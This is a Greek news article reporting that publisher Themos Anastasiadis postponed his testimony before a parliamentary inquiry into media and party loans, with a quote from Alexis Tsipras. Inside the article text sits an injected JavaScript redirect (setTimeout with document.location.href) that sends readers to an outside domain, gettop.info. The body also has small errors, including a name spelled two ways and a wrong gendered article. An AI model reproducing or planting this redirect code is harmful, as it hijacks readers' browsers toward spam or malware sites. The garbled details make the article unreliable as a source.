Πότε θα καταθέσει ο Θέμος Αναστασιάδης στην Εξεταστική για τα δάνεια σε ΜΜΕ

0
30

Αναβλήθηκε η προγραμματισμένη για αύριο, Τετάρτη, κατάθεση του Θέμου Αναστασιάδη στην Εξεταστική Επιτροπή της Βουλής, που ερευνά τα τραπεζικά δάνεια των κομμάτων στα ΜΜΕ και στα πολιτικά κόμματα.

Ο πρόεδρος της Επιτροπής, Σωκράτης Φάμμελος, ανακοίνωσε στα μέλη της ότι ο εκδότης του Πρώτου Θέματος επικοινώνησε τηλεφωνικά μαζί του και του ζήτησε να καταθέσει την επόμενη εβδομάδα, επικαλούμενος προσωπικό πρόβλημα. «Έκρινα ότι το προβλημά του είναι υπαρκτό και συμφώνησα», τόνισε ο κ. Φάμελος.

Υπενθυμίζεται ότι ο πρωθυπουργός Αλέξης Τσίπρας, στη χθεσινή συζήτηση στη Βουλή για τη διαπλοκή και τη διαφθορά, αναφέρθηκε στον Θέμο Αναστασιάδη, χωρίς να τον κατονομάσει. «Κύριε Μητσοτάκη», είπε στην αρχηγό της ΝΔ, «βλέπω ότι συνεχώς επικαλείστε δημοσιεύματα κίτρινων εφημερίδων, όπως το Πρώτο Θέμα. Και να δεν κάνω λάθος, ο εκδότης του, ο περίφημος «κομιστής», θα εμφανιστεί να καταθέσε ενώπιον της Εξεταστικής Επιτροπής», συμπλήρωσε γελώντας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here